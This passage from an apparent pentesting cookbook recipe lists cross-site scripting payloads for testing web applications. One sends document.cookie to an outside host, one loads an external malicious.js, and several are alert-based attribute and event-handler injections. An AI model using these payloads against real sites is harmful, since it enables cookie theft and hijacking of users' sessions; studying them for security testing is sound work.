In this recipe, we used the <script> tag to inject a JavaScript code block into the page; however, this is not the only HTML tag we can use, especially with the additions made by HTML5, where we have <video> and <audio>, for example. Let's see some other payloads we could have used to exploit XSS:
- Generating an error event on tags with an src/source parameter, such as <img>, <audio>, and <video>:
<img src=X onerror="javascript:document.write('<img src="http://192.168.56.10:88/img'+document.cookie+'">')">
Or, use the following:
<audio><source onerror="javascript:alert('XSS')">
Or, there is also this:
<video><source onerror="javascript:alert('XSS')">
- Injecting a <script> tag that loads an external JavaScript file:
<script src="http://192.168.56.10:88/malicious.js">
- If the injected text is set as a value inside an HTML tag and surrounded by quotes ("), like in <input value="injectable_text">, we can close the quotes and add an event to the code. For example, replace injectable_text with the following code. Notice how the last quote is not closed so we can use the one already in the HTML code:
" onmouseover="javascript:alert('XSS')
- Injecting a link or other tag with the href property to make it execute code whenever it is clicked:
<a href="javascript:alert('XSS')">Click here</a>
There are a multitude of variations of tags, encodings, and instructions that can be used to exploit an XSS vulnerability. For a more complete reference, see the OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.